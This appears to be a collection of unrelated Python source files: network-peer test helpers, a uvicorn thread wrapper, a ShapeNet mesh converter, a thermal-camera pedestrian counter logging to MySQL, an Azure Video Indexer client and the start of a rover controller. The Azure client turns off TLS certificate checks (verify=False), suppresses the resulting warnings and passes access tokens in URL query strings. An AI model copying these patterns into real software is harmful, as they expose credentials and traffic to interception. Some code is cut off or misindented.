    """Stop every model in *cluster*, then join them one by one with progress output."""
    for member in cluster:
        member.stop()
    for idx, member in enumerate(cluster, start=1):
        member.join()
        print("Terminating model {0}...".format(idx), end="\r")
    print("\nAll models terminated")
def swap_in(stdout):
    """Install *stdout* as sys.stdout and return the object it replaced.

    The replacement must support the usual read/write file operations.
    """
    previous, sys.stdout = sys.stdout, stdout
    return previous
def swap_out():
    """Replace sys.stdout with a fresh StringIO and return the displaced object."""
    previous, sys.stdout = sys.stdout, StringIO()
    return previous
def mean(lst):
    """Arithmetic mean of a non-empty sequence of numbers."""
    total = 0
    for value in lst:
        total += value
    return total / len(lst)
##########################################
# Old Functions
#
def __send_shutdown(obj):
    """Remnant of the time when we had to send the Death Sequence to shut down peers.

    NOTE(review): `socket` is no longer imported in this module, so calling
    this would raise NameError — kept only for historical reference.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('127.0.0.1', obj.port))
    # 0x02 terminates the death sequence frame.
    s.send(obj.networker.death_sequence + b"\x02")
    s.close()
    print("Network is about to collapse...")
def prepare_logging_locations():
    """Logging location determination function from before the time we used
    logging from python's logger library.

    :return: (portfile, logfile) paths appropriate for the host OS.
    :raises RuntimeError: on unrecognised platforms (os.name == "java").
    """
    logfile, portfile = "/tmp/unisocket_logs", "/tmp/unisocket_port"
    if os.name == "nt":
        # Windows has no /tmp; fall back to relative file names.
        logfile, portfile = "unisocket_logs", "unisocket_port"
    elif os.name == "java":
        # I have no fucken' idea. Android?
        # BUG FIX: assert(False) is stripped under `python -O`; raise instead
        # so the unknown-platform case always fails loudly.
        raise RuntimeError("I don't know that system")
    return portfile, logfile
def gen_payload(size):
    """Return *size* bytes of random junk for a test payload.

    NOTE(review): `os` is not imported in this module's visible imports —
    verify before use.
    """
    # Most of our big payloads will have a lot of randomized junk...
    # ...Yet most of our packets will be small
    return os.urandom(size)
def old_build_network(start_port, total = None):
    """Defunct UniSocket network builder.

    Starts `total` (default: random 5-10) UnisocketModel peers on consecutive
    ports from `start_port`, connecting each new peer to a random earlier one.

    NOTE(review): relies on UnisocketModel, random, threading and
    __trigger_connection, none of which are imported/defined in this module —
    kept for historical reference only.
    """
    models = []
    ports = []
    port = start_port
    total = total or random.randrange(5, 10)
    print("Starting from {0}".format(start_port))
    for progress in range(total):
        while True:
            n = UnisocketModel(port, name = str(port-start_port)) # Should fail the first time
            try:
                n.start()
                if len(ports) > 0:
                    # Wire the new peer to one already-running peer.
                    rport = random.choice(ports)
                    tr = threading.Thread(target = __trigger_connection, args = (n, ("127.0.0.1", rport)))
                    tr.start()
                    print("Connecting {0} to {1}".format(port, rport))
                ports.append(port)
                models.append(n)
                port += 1
                print("Connected peer {0}/{1} ".format(progress+1, total), end = "\r")
            except OSError:
                # Port in use: advance and retry on the next port.
                n.stop() # FFS just let any ghost thread die, in case
                port += 1
                continue
            else:
                break
    print("")
    # Sanity check: every peer ended up with at least one connection.
    isolated = [x for x in models if len(x.peers) == 0]
    print(ports)
    print(isolated)
    assert(len(isolated) == 0)
    return models
|
uvicorn_server_context.py | import contextlib
import time
import threading
import uvicorn
import asyncio
# https://github.com/encode/uvicorn/issues/742
# provides easy to use context
# config = Config(app=app, port = os.environ.get('PORT', '8081'))
# server = UvicornServerContext(config)
# with server.run_in_thread():
# while True:
# time.sleep(1e-3)
class UvicornServerContext(uvicorn.Server):
    """uvicorn.Server variant that can run inside a background thread.

    See https://github.com/encode/uvicorn/issues/742 and the usage example at
    the top of this module.
    """

    def install_signal_handlers(self):
        # Signal handlers can only be installed from the main thread; when
        # running in a worker thread we must skip uvicorn's default setup.
        pass

    @contextlib.contextmanager
    def run_in_thread(self):
        """Run the server on a background thread for the duration of the context."""
        thread = threading.Thread(target=self.run)
        thread.start()
        try:
            # Busy-wait until uvicorn reports startup complete.
            while not self.started:
                time.sleep(1e-3)
            yield
        finally:
            # Ask the server loop to exit, then wait for the thread to finish.
            self.should_exit = True
            thread.join()
|
process_shapenet.py | import open3d as o3d
import numpy as numpy
import glob
import os
from tqdm import tqdm
from multiprocessing import Pool
import multiprocessing
# Root of the ShapeNetCore.v2 dataset and destination for converted .off files.
SHAPENET_ROOT="/home/daxuan/Dataset/ShapeNetCore.v2"
OUTPUT_PATH = "/home/daxuan/Dataset/off_files"
def get_shapenet_files(category):
    """Return all .obj model paths under SHAPENET_ROOT for one category id."""
    files = glob.glob("%s/%s/**/models/*.obj" % (SHAPENET_ROOT, category), recursive=True)
    return files
def convert_obj_off1(file_path):
    """Convert one ShapeNet .obj mesh to .off in OUTPUT_PATH (best effort).

    Unlike convert_obj_off(), errors are swallowed after logging so one
    corrupt mesh cannot abort a whole batch run.
    """
    try:
        # Copy only vertices/triangles so the .off writer sees bare geometry.
        mesh_obj = o3d.io.read_triangle_mesh(file_path)
        mesh_off = o3d.geometry.TriangleMesh()
        mesh_off.vertices = mesh_obj.vertices
        mesh_off.triangles = mesh_obj.triangles
        o3d.io.write_triangle_mesh(os.path.join(OUTPUT_PATH, get_obj_file_name(file_path)), mesh_off)
    except KeyboardInterrupt:
        # Propagate a user interrupt as a clean exit.  (The unreachable
        # `pass` that followed exit(0) in the original has been removed.)
        exit(0)
    except Exception as e:
        # Report the actual exception — the original bound `e` but never used it.
        print("Error processing: %s" % file_path)
        print(e)
def convert_obj_off(file_path):
    """Convert one .obj mesh to .off in OUTPUT_PATH, skipping existing outputs."""
    if os.path.exists(os.path.join(OUTPUT_PATH, get_obj_file_name(file_path))):
        return
    print(file_path)
    # Copy only vertices/triangles so the .off writer sees bare geometry.
    mesh_obj = o3d.io.read_triangle_mesh(file_path)
    mesh_off = o3d.geometry.TriangleMesh()
    mesh_off.vertices = mesh_obj.vertices
    mesh_off.triangles = mesh_obj.triangles
    o3d.io.write_triangle_mesh(os.path.join(OUTPUT_PATH, get_obj_file_name(file_path)), mesh_off)
def convert_obj_off_wrapper(file_path):
    """Run convert_obj_off in a child process with a 10-second timeout."""
    p = multiprocessing.Process(target=convert_obj_off, args=(file_path,))
    p.start()
    # Wait for 10 seconds or until process finishes
    p.join(10)
    # If thread is still active
    if p.is_alive():
        # Conversion hung (bad mesh): kill the child and move on.
        print("Killing %s" % file_path)
        p.terminate()
        p.join()
def get_obj_file_name(file_path):
    """Map a ShapeNet model path to '<category>/<model_id>.off'.

    e.g. .../<category>/<model_id>/models/model.obj -> '<category>/<model_id>.off'
    """
    parts = file_path.split("/")
    return "{0}/{1}.off".format(parts[-4], parts[-3])
if __name__ == "__main__":
categories = ["02691156", "02933112", "03001627", "03636649", "04090263", "04379243", "04530566", "02828884", "02958343", "03211117", "03691459", "04256520", "04401088"]
files = []
for category in categories:
print("Working on %s..." % category)
if not os.path.exists(os.path.join(OUTPUT_PATH, category)):
os.system("mkdir -p %s" % os.path.join(OUTPUT_PATH, category))
files += get_shapenet_files(category)
pool = Pool(40)
for _ in tqdm(pool.imap_unordered(convert_obj_off, files), total=len(files)):
pass
pool.close()
pool.join()
|
thermal_save_mysql.py | import pygame
import os
import math
import time
from datetime import datetime, date
import numpy as np
from scipy.interpolate import griddata
from scipy import stats
import cv2
from colour import Color
from CentroidTracker import CentroidTracker
from multiprocessing import Process, active_children
import pexpect
import argparse
import busio
import board
import adafruit_amg88xx
import json
import gpsd
import threading
import sys
import RPi.GPIO as GPIO
from dragino import Dragino
import logging
from trackableobject import TrackableObject
import mysql.connector
from pytz import timezone
# some utility functions
def constrain(val, min_val, max_val):
    """Clamp *val* to the inclusive range [min_val, max_val]."""
    clamped = max(val, min_val)
    return min(clamped, max_val)
def map_value(x, in_min, in_max, out_min, out_max):
    """Linearly rescale *x* from [in_min, in_max] onto [out_min, out_max]."""
    span_ratio = (out_max - out_min) / (in_max - in_min)
    return (x - in_min) * span_ratio + out_min
def mysql_save_insert(mysql_config, payload_data):
    """Insert one pedestrian-count row into the ped_count table.

    :param mysql_config: dict with host/user/passwd/database plus
        device_id/description loaded from mysql_config.json.
    :param payload_data: dict with 'c' (count), 'a' (latitude), 'o' (longitude).
    """
    sqlDate = datetime.now(timezone('America/Edmonton')).strftime('%Y-%m-%d %H:%M:%S')
    conn = mysql.connector.connect(
        host=mysql_config["host"],
        user=mysql_config["user"],
        passwd=mysql_config["passwd"],
        database=mysql_config["database"]
    )
    cursor = conn.cursor()
    sql = "INSERT INTO ped_count (count, device_id, description, time_stamp, latitude, longitude) VALUES (%s, %s, %s, %s, %s, %s)"
    # BUG FIX: use the payload passed in — the original ignored its `list`
    # argument (which also shadowed the builtin) and read the global instead.
    val = (payload_data['c'], mysql_config["device_id"],
           mysql_config["description"], sqlDate, payload_data['a'], payload_data['o'])
    try:
        cursor.execute(sql, val)
        conn.commit()
        print("inserted values %s" % (str(val)))
    except mysql.connector.IntegrityError:
        # BUG FIX: the original caught MySQLdb.IntegrityError, but MySQLdb is
        # never imported here, so the handler itself raised NameError.
        print("failed to insert values %s" % (str(val)))
    finally:
        cursor.close()
        conn.close()
def send_mysql(delay):
    """Every *delay* seconds, push the current payload to MySQL in a fresh process.

    Any still-running 'mysql_proc' from the previous round is terminated first
    so a hung insert cannot pile up.
    """
    global payload
    with open("mysql_config.json") as f:
        mysql_config = json.load(f)
    while True:
        for child in active_children():
            if child.name == 'mysql_proc':
                child.terminate()
        proc = Process(
            target=mysql_save_insert, name='mysql_proc', args=(mysql_config, payload, ))
        proc.start()
        time.sleep(delay)
def count_within_range(list1, l, r):
    '''
    Helper function to count how many numbers in list1 fall into the
    inclusive range [l, r].
    '''
    return sum(1 for x in list1 if l <= x <= r)
# Shared state read by the background MySQL sender thread/process:
# a - latitude
# o - longitude
# c - count
payload = {'a': 53.539738, 'o': -113.489795, 'c': 0}
last_count = 0
def main():
    """Thermal pedestrian counter: read AMG88xx frames, detect and track blobs,
    count line crossings (IN/OUT), and publish counts via the background MySQL
    sender thread."""
    global payload
    # argument parsing
    parser = argparse.ArgumentParser()
    parser.add_argument(
        '--headless', help='run the pygame headlessly', action='store_true')
    parser.add_argument(
        "--color_depth", help="integer number of colors to use to draw temps", type=int)
    parser.add_argument(
        '--max_temp', help='initial max temperature', type=int)
    parser.add_argument(
        '--ambient_offset', help='value to offset ambient temperature by to get rolling MAXTEMP', type=int)
    parser.add_argument(
        '--ambient_time', help='length of ambient temperature collecting intervals in seconds', type=int)
    parser.add_argument(
        '--blob_min_threshold', help='blod detection min threshold', type=int)
    parser.add_argument(
        '--blob_max_threshold', help='blod detection min threshold', type=int)
    parser.add_argument(
        '--blob_filterbyarea', help='blod detection filter by area', action='store_true')
    parser.add_argument(
        '--blob_min_area', help='blod detection filter by area min area', type=int)
    parser.add_argument(
        '--blob_filterbycircularity', help='blod detection filter by circularity', action='store_true')
    parser.add_argument(
        '--blob_min_circularity', help='blod detection filter by circularity min circularity', type=float)
    parser.add_argument(
        '--blob_filterbyconvexity', help='blod detection filter by convexity', action='store_true')
    parser.add_argument(
        '--blob_min_convexity', help='blod detection filter by convexity min convexity', type=float)
    parser.add_argument(
        '--blob_filterbyinertia', help='blod detection filter by inertia', action='store_true')
    parser.add_argument(
        '--blob_min_inertiaratio', help='blod detection filter by inertia inertia ratio', type=float)
    parser.add_argument(
        '--mysql_send_interval', help='length of intervals between attempted mysql insert in seconds', type=int)
    args = parser.parse_args()
    print(args)
    i2c_bus = busio.I2C(board.SCL, board.SDA)
    COLOR_DEPTH = args.color_depth
    MAX_TEMP = args.max_temp
    AMBIENT_OFFSET = args.ambient_offset
    AMBIENT_TIME = args.ambient_time
    BLOB_MIN_THRESHOLD = args.blob_min_threshold
    BLOB_MAX_THRESHOLD = args.blob_max_threshold
    BLOB_FILTERBYAREA = args.blob_filterbyarea
    BLOB_MIN_AREA = args.blob_min_area
    BLOB_FILTERBYCIRCULARITY = args.blob_filterbycircularity
    BLOB_MIN_CIRCULARITY = args.blob_min_circularity
    BLOB_FILTERBYCONVEXITY = args.blob_filterbyconvexity
    BLOB_MIN_CONVEXITY = args.blob_min_convexity
    BLOB_FILTERBYINERTIA = args.blob_filterbyinertia
    BLOB_MIN_INERTIARATIO = args.blob_min_inertiaratio
    MYSQL_SEND_INTERVAL = args.mysql_send_interval
    if args.headless:
        # dummy video driver lets pygame render without a display attached
        os.putenv('SDL_VIDEODRIVER', 'dummy')
    else:
        os.putenv('SDL_FBDEV', '/dev/fb1')
    pygame.init()
    # initialize the sensor
    sensor = adafruit_amg88xx.AMG88XX(i2c_bus)
    points = [(math.floor(ix / 8), (ix % 8)) for ix in range(0, 64)]
    grid_x, grid_y = np.mgrid[0:7:32j, 0:7:32j]
    # sensor is an 8x8 grid so lets do a square
    height = 240
    width = 240
    # the list of colors we can choose from
    black = Color("black")
    colors = list(black.range_to(Color("white"), COLOR_DEPTH))
    # create the array of colors
    colors = [(int(c.red * 255), int(c.green * 255), int(c.blue * 255))
              for c in colors]
    displayPixelWidth = width / 30
    displayPixelHeight = height / 30
    lcd = pygame.display.set_mode((width, height))
    lcd.fill((255, 0, 0))
    pygame.display.update()
    pygame.mouse.set_visible(False)
    lcd.fill((0, 0, 0))
    pygame.display.update()
    # Setup SimpleBlobDetector parameters.
    params = cv2.SimpleBlobDetector_Params()
    # Change thresholds
    if BLOB_MIN_THRESHOLD:
        params.minThreshold = BLOB_MIN_THRESHOLD
    if BLOB_MAX_THRESHOLD:
        params.maxThreshold = BLOB_MAX_THRESHOLD
    # Filter by Area.
    if BLOB_FILTERBYAREA:
        params.filterByArea = BLOB_FILTERBYAREA
        params.minArea = BLOB_MIN_AREA
    # Filter by Circularity
    if BLOB_FILTERBYCIRCULARITY:
        params.filterByCircularity = BLOB_FILTERBYCIRCULARITY
        params.minCircularity = BLOB_MIN_CIRCULARITY
    # Filter by Convexity
    if BLOB_FILTERBYCONVEXITY:
        params.filterByConvexity = BLOB_FILTERBYCONVEXITY
        params.minConvexity = BLOB_MIN_CONVEXITY
    # Filter by Inertia
    if BLOB_FILTERBYINERTIA:
        params.filterByInertia = BLOB_FILTERBYINERTIA
        params.minInertiaRatio = BLOB_MIN_INERTIARATIO
    # Set up the detector with default parameters.
    detector = cv2.SimpleBlobDetector_create(params)
    # initialize centroid tracker
    ct = CentroidTracker()
    # a dictionary to map each unique object ID to a TrackableObject
    trackableObjects = {}
    # the total number of objects that have moved either up or down
    total_down = 0
    total_up = 0
    total_down_old = 0
    total_up_old = 0
    # let the sensor initialize
    time.sleep(.1)
    # press key to exit
    screencap = True
    # array to hold mode of last 10 minutes of temperatures
    mode_list = []
    # background thread publishes `payload` to MySQL every MYSQL_SEND_INTERVAL s
    send_thread = threading.Thread(
        target=send_mysql, args=(MYSQL_SEND_INTERVAL,))
    send_thread.start()
    print('sensor started!')
    while(screencap):
        start = time.time()
        # read the pixels
        pixels = []
        for row in sensor.pixels:
            pixels = pixels + row
        # payload['a'] = 0
        # payload['o'] = 0
        payload['c'] = ct.get_count_since_last_reading()
        # Mode of the rounded frame approximates the ambient temperature.
        mode_result = stats.mode([round(p) for p in pixels])
        mode_list.append(int(mode_result[0]))
        # instead of taking the ambient temperature over one frame of data take it over a set amount of time
        MAX_TEMP = float(np.mean(mode_list)) + AMBIENT_OFFSET
        pixels = [map_value(p, mode_result[0] + 1, MAX_TEMP, 0,
                            COLOR_DEPTH - 1) for p in pixels]
        # perform interpolation
        bicubic = griddata(points, pixels, (grid_x, grid_y), method='cubic')
        # draw everything
        for ix, row in enumerate(bicubic):
            for jx, pixel in enumerate(row):
                try:
                    pygame.draw.rect(lcd, colors[constrain(int(pixel), 0, COLOR_DEPTH - 1)],
                                     (displayPixelHeight * ix, displayPixelWidth * jx, displayPixelHeight, displayPixelWidth))
                except:
                    # NaNs from the cubic interpolation can break int()/indexing
                    print("Caught drawing error")
        surface = pygame.display.get_surface()
        myfont = pygame.font.SysFont("comicsansms", 25)
        img = pygame.surfarray.array3d(surface)
        img = np.swapaxes(img, 0, 1)
        # Read image
        img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
        img = cv2.bitwise_not(img)
        # Detect blobs.
        keypoints = detector.detect(img)
        img_with_keypoints = cv2.drawKeypoints(img, keypoints, np.array(
            []), (0, 0, 255), cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)
        # draw a horizontal line in the center of the frame -- once an
        # object crosses this line we will determine whether they were
        # moving 'up' or 'down'
        pygame.draw.line(lcd, (255, 255, 255),
                         (0, height // 2), (width, height // 2), 2)
        pygame.display.update()
        for i in range(0, len(keypoints)):
            x = keypoints[i].pt[0]
            y = keypoints[i].pt[1]
            # print circle around blobs
            pygame.draw.circle(lcd, (200, 0, 0), (int(
                x), int(y)), round(keypoints[i].size), 2)
        # update our centroid tracker using the detected centroids
        objects = ct.update(keypoints)
        # loop over the tracked objects
        for (objectID, centroid) in objects.items():
            # check to see if a trackable object exists for the current
            # object ID
            to = trackableObjects.get(objectID, None)
            # if there is no existing trackable object, create one
            if to is None:
                to = TrackableObject(objectID, centroid)
            # otherwise, there is a trackable object so we can utilize it
            # to determine direction
            else:
                # the difference between the y-coordinate of the *current*
                # centroid and the mean of *previous* centroids will tell
                # us in which direction the object is moving (negative for
                # 'up' and positive for 'down')
                y = [c[1] for c in to.centroids]
                direction = centroid[1] - np.mean(y)
                to.centroids.append(centroid)
                # check to see if the object has been counted or not
                if not to.counted:
                    # if the direction is negative (indicating the object
                    # is moving up) AND the centroid is above the center
                    # line, count the object
                    # the historical centroid must present in the lower half of the screen
                    if direction < 0 and centroid[1] < height // 2 and count_within_range(y, height // 2, height) > 0:
                        total_up += 1
                        to.counted = True
                    # if the direction is positive (indicating the object
                    # is moving down) AND the centroid is below the
                    # center line, count the object
                    # the historical centroid must present in the upper half of the screen
                    elif direction > 0 and centroid[1] > height // 2 and count_within_range(y, 0, height // 2) > 0:
                        total_down += 1
                        to.counted = True
            # store the trackable object in our dictionary
            trackableObjects[objectID] = to
        # update counter in top left
        textsurface1 = myfont.render(
            "IN: " + str(total_up), False, (255, 255, 255))
        textsurface2 = myfont.render(
            'OUT: ' + str(total_down), False, (255, 255, 255))
        lcd.blit(textsurface1, (0, 0))
        lcd.blit(textsurface2, (0, 25))
        total_up_old = total_up
        total_down_old = total_down
        pygame.display.update()
        for event in pygame.event.get():
            if event.type == pygame.KEYDOWN:
                print('terminating...')
                screencap = False
                break
        # for running the save on for a certain amount of time
        # if time.time() - start_time >= 10:
        # print('terminating...')
        # screencap = False
        # empty mode_list every AMBIENT_TIME *10 seconds to get current ambient temperature
        if len(mode_list) > AMBIENT_TIME:
            mode_list = []
        # cap the loop at ~25 FPS
        time.sleep(max(1. / 25 - (time.time() - start), 0))
    # Release everything if job is finished
    cv2.destroyAllWindows()
if __name__ == "__main__":
main()
|
azure_api.py | import os
import requests
import urllib3
import time
import threading
import subprocess
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
#This file is a video indexer API
import logging
logging.basicConfig(filename='./logs/example.log',level=logging.DEBUG)
#Log format
#logging.debug('This message should go to the log file')
#logging.info('So should this')
#logging.warning('And this, too')
class Video_Upload_API():
def __init__(self, account_id, subscription_key, account_type="trial"):
self.subscription_key = subscription_key
self.access_token = ""
self.account_type = account_type# also known as location in API
self.account_id = account_id
self.subscription_key = subscription_key
self.video_names = []
self.API_AUTH_URL = "https://api.videoindexer.ai/auth/{0}/Accounts/{1}".format(account_type, account_id)
self.API_VIDEO_URL = "https://api.videoindexer.ai/{0}/Accounts/{1}".format(account_type, account_id)
self.API_VIDEO_INDEX_URL = "https://api.videoindexer.ai/{0}/Accounts/".format(account_id)
    def get_access_token(self):
        """Request, cache and return an account-level access token (allowEdit=true)."""
        querystring = {"allowEdit": "true"}
        headers = {
            'Ocp-Apim-Subscription-Key': self.subscription_key,
            'Host': "api.videoindexer.ai"
        }
        url = '{0}/AccessToken'.format(self.API_AUTH_URL)
        logging.info("calling: " + url)
        response = requests.get(url, headers=headers, params=querystring, verify=False)
        # The token arrives as a JSON string literal; strip the quotes.
        self.access_token = response.text.replace('"', '')
        if len(self.access_token):
            logging.info("Retrieved Access Token")
        return self.access_token
    def get_video_names(self):
        """Append the names of all videos in the account to self.video_names (deduplicated).

        Assumes self.access_token is already populated.
        """
        url = "https://api.videoindexer.ai/{0}/Accounts/{1}/Videos?accessToken={2}".format(self.account_type,
                                                                                           self.account_id,
                                                                                           self.access_token)
        json_videos = requests.get(url, verify=False)
        for i in json_videos.json()["results"]:
            video_name = str(i["name"])
            if video_name not in self.video_names:
                self.video_names.append(video_name)
    def upload_video_file(self, video_name, file_path, language="auto", indexing_preset="AudioOnly",
                          streaming_preset="Default", replace = False):
        """Upload a local video file and block until indexing finishes.

        :param video_name: name to give the video in Video Indexer.
        :param file_path: local path of the file to upload.
        :param language: indexing language, or "auto" to detect.
        :param indexing_preset: indexing preset, e.g. "AudioOnly".
        :param streaming_preset: streaming preset, e.g. "Default".
        :param replace: accepted but currently unused.
        :return: the new video's id as a string, or "None" on failure.
        """
        if self.access_token == "":
            self.get_access_token()
        # Upload a video
        upload_video_url = "{0}/Videos?accessToken={1}&name={2}&language={3}&indexingPreset={4}&streamingPreset={5}".format(
            self.API_VIDEO_URL,
            self.access_token, video_name, language, indexing_preset, streaming_preset)
        # NOTE(review): `f` is never closed; consider `with open(...)`.
        f = open(file_path, 'rb')
        files = {'file': f}
        headers = {'Host': 'api.videoindexer.ai'}
        logging.info("Calling request to upload video ... " + file_path)
        response = requests.post(upload_video_url, files=files, headers=headers, verify=False)
        logging.info("Sent request for ... " + file_path)
        if response.ok:
            # Blocks here polling until the indexer reports Processed/Failed.
            logging.info("Uploaded video ... determining status")
            self.check_upload_status(response.json()["id"])
        else:
            logging.info("error: ")
            logging.info(response.json())
        #self.check_upload_status(response.json()['id'])
        if "id" in response.json().keys():
            return response.json()["id"] #returns video id
        return "None"
    def check_upload_status(self, upload_id):
        """Poll the video index every 2 s until processing completes or fails.

        :param upload_id: id returned by the upload call.
        :return: 0 once state is 'Processed'; otherwise a dict that may hold
            detected source-language info ('lang', 'level'); {} when
            upload_id is falsy.
        """
        result = {}
        if upload_id:
            progress_url = "{0}/Videos/{1}/Index?accessToken={2}".format(self.API_VIDEO_URL, upload_id,
                                                                         self.access_token)
            while True:
                logging.info("Waiting for " + str(upload_id) + " to finish indexing")
                time.sleep(2)
                response = requests.get(progress_url, verify=False)
                if 'state' in response.json().keys():
                    print(response.json()['state'])
                    if response.json()['state'] == 'Failed':
                        logging.info("Failed to upload video. Please try re-uploading")
                        break
                    if response.json()['state'] == 'Processed':
                        return 0
                    # Still processing: report the detected source language
                    # and its confidence, then stop polling.
                    logging.info("*" * 10)
                    logging.info("The source language is: ")
                    result['lang'] = response.json()['videos'][0]['sourceLanguage']
                    logging.info(result['lang'])
                    response = requests.get(progress_url, verify=False)
                    logging.info(response.json()['videos'][0]['insights'].keys())
                    if 'sourceLanguageConfidence' in response.json()['videos'][0]['insights'].keys():
                        result['level'] = response.json()['videos'][0]['insights']['sourceLanguageConfidence']
                        logging.info("Source Language Confidence is: " + str(
                            response.json()['videos'][0]['insights']['sourceLanguageConfidence']))
                    else:
                        logging.info("Language confidence could not be determined.")
                        result['level'] = "Unknown"
                    break
                else:
                    # NOTE(review): `.keys()['Message']` looks wrong (keys views
                    # aren't subscriptable) — would raise here; confirm intent.
                    logging.info("State could not be found for " + upload_id + " " + str(response.json().keys()['Message']))
        return result
def get_language(self, video_id = None): ## deprecated use new_get_language
    """Return (language, confidence) for an indexed video.

    Deprecated — prefer new_get_language().  Fetches an access token first
    when none is cached.  Returns the int 1 when no video_id is supplied
    (legacy error signalling); confidence is None when the service did not
    report one.
    """
    if video_id is None:
        logging.info("Error")
        return 1
    if not self.access_token:
        self.get_access_token()
    index_url = "https://api.videoindexer.ai/{0}/Accounts/{1}/Videos/{2}/Index?accessToken={3}&language=English".format(
        self.account_type, self.account_id, video_id, self.access_token)
    response = requests.get(index_url, verify=False)
    if response.status_code != 200:
        logging.info("Error Number: " + str(response.status_code))
        logging.info(response.json())
    insights = response.json()["videos"][0]["insights"]
    language = insights["sourceLanguage"]
    confidence = insights.get("sourceLanguageConfidence")
    logging.info("language: " + str(language) + "\naccuracy: " + str(confidence))
    return language,confidence
#TODO: get the ids of just the files that have been indexed from the Wav-Clips
def get_video_ids(self):
    """Return {video_id: file_name} for every video in the account.

    Fetches an access token first when none is cached.  On an unexpected
    response shape the raw payload is printed and a generic Exception is
    raised (kept for backward compatibility with existing callers).

    BUG FIX: removed two unreachable lines that duplicated the access-token
    check after the return statement.
    """
    if self.access_token == "":
        self.get_access_token()
    req = requests.get(
        "https://api.videoindexer.ai/{0}/Accounts/{1}/Videos?accessToken={2}".format(
            self.account_type, self.account_id, self.access_token),
        verify=False)
    videos = {}
    try:
        for entry in req.json()['results']:
            videos[str(entry["id"])] = str(entry["name"])
    except Exception:
        # Surface the unexpected payload before failing, as before.
        print(req.json())
        raise Exception
    return videos  # returns Dictionary with format "id":"name of file"
def new_get_video_ids(self, video_id=None):
    """Return {id: name} entries from a video's LanguageDetection artifact listing.

    BUG FIX: the original referenced an undefined ``video_id`` (NameError on
    every call) and joined the accessToken query parameter with '?' instead
    of '&'.  The video id is now an explicit parameter (default None keeps
    the no-argument call signature valid) and the URL is well formed.
    NOTE(review): the ArtifactUrl endpoint may not return a 'results' list —
    confirm the expected payload shape against the Video Indexer API.
    """
    if video_id is None:
        logging.debug("new_get_video_ids called without a video_id")
        return {}
    if self.access_token == "":
        self.get_access_token()
    artifact_type = "LanguageDetection"
    req = requests.get(
        "https://api.videoindexer.ai/{0}/Accounts/{1}/Videos/{2}/ArtifactUrl?type={3}&accessToken={4}".format(
            self.account_type, self.account_id, video_id, artifact_type, self.access_token),
        verify=False)
    videos = {}
    for entry in req.json()['results']:
        videos[str(entry["id"])] = str(entry["name"])
    return videos  # returns Dictionary with format "id":"name of file"
def new_get_language(self, video_id = None):
    """Resolve the LanguageDetection artifact for *video_id* and return
    (language, confidence, full_artifact_json).

    Returns the int 1 when no video_id is supplied, and (0, 0, {}) when the
    artifact URL cannot be retrieved (legacy error signalling).
    """
    if video_id is None:
        logging.debug("Error")
        return 1
    if not self.access_token:
        self.get_access_token()
    artifact_url_endpoint = (
        "https://api.videoindexer.ai/{0}/Accounts/{1}/Videos/{2}/ArtifactUrl?type={3}&accessToken={4}".format(
            self.account_type, self.account_id, video_id, "LanguageDetection", self.access_token))
    response = requests.get(artifact_url_endpoint, verify=False)
    if response.status_code != 200:
        print("Error retrieving response for video from azure: ")
        print(response.json())
        return 0, 0, {}
    # The first call returns a (signed) URL pointing at the artifact itself.
    artifact_url = response.json()
    artifact = requests.get(str(artifact_url), verify=False).json()
    return artifact["MasterLanguage"], artifact["Confidence"], artifact
def index_files(self, directory):
    """Upload every file in *directory* that is not already indexed.

    Spawns one uploader thread per new file and blocks until all uploads
    return.  Always returns 0.
    """
    already_indexed = list(self.get_video_ids().values())
    workers = []
    for entry in os.listdir(directory):
        name = str(entry)
        if name not in already_indexed:
            logging.info("Uploading " + name)
            workers.append(threading.Thread(
                target=self.upload_video_file,
                args=(name, directory + "/" + name)))
    for worker in workers:
        worker.start()
    # Block until every upload thread has finished.
    for worker in workers:
        worker.join()
    return 0
def clean_index(self, arr):  # arr contains index numbers of files to be deleted
    """Delete each video id in *arr* from the Video Indexer account.

    Logs a warning for every deletion that does not come back with the
    expected 204 status.  Always returns 0.
    """
    delete_template = "https://api.videoindexer.ai/{0}/Accounts/{1}/Videos/{2}?accessToken={3}"
    for video_id in arr:
        logging.info("Deleting " + video_id)
        req = requests.delete(delete_template.format(
            self.account_type, self.account_id, video_id, self.access_token))
        if str(req.status_code) != str(204):
            logging.warning("Failed to Delete " + video_id)
    return 0
|
rover_a.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import ConfigParser
import logging
import numpy
import threading
import time
import Adafruit_PCA9685
import atexit
from flask import Flask
from sqlalchemy import create_engine, case
from sqlalchemy.orm import sessionmaker
from sqlalchemy.sql import func
from models import Base, Map, MapCell, Scan, ScanResult
from scanner import Scanner
from trackcontroller import TrackController
from util import bresenham, pol2cart
# Configuration
# Rover identifier word (0x0061 == ASCII 'a' — presumably "rover a"; confirm).
MY_NAME = 0x0061
# GPIO pin wired to the wheel-encoder interrupt line.
GPIO_PIN_WHEEL_ENCODER_INT = 4
# I2C bus addresses of the rover's peripherals (must match the physical wiring).
I2C_ADDR_FORWARD_DISTANCE = 0x29
I2C_ADDR_PWM_CONTROLLER = 0x4F
I2C_ADDR_WHEEL_CONTROLLER = 0x6F
I2C_ADDR_WHEEL_ENCODERS = 0x27
# Channel index of the forward scanner servo on the PWM controller.
PWM_FORWARD_SCANNER = 3
# Calibration
# Mechanical sweep limits of the scanner servo (degrees) and the PWM pulse
# counts that map onto them — handed to Scanner in RoverA.__init__.
FORWARD_SCANNER_DEGREES_MIN = 6
FORWARD_SCANNER_DEGREES_MAX = 174
FORWARD_SCANNER_PULSE_MIN = 150
FORWARD_SCANNER_PULSE_MAX = 599
# Initialization
# logging.basicConfig(level=logging.INFO, format='%(levelname)8s (%(threadName)-10s) %(message)s')
logging.basicConfig(level=logging.INFO, format='%(asctime)s %(levelname)8s (%(threadName)-10s) %(name)s: %(message)s')
log = logging.getLogger(__name__)
class RoverA:
    """Differential-drive rover controller.

    Sweeps a servo-mounted distance sensor, rasterizes the polar readings
    into an occupancy grid persisted through SQLAlchemy, and serves a text
    rendering of the map over HTTP (Flask, background thread).
    """

    def __init__(self):
        log.info("Hello! Starting a-Rex")
        # Parse Config
        Config = ConfigParser.ConfigParser()
        Config.read("config.ini")
        # Init DB
        connection_string = Config.get('database', 'engine')
        engine = create_engine(connection_string, echo=False)
        Base.metadata.create_all(engine)
        self.DBSession = sessionmaker(bind=engine)
